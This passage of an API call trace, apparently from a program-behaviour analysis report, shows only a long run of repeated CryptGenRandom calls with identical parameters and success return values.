[0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.846] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 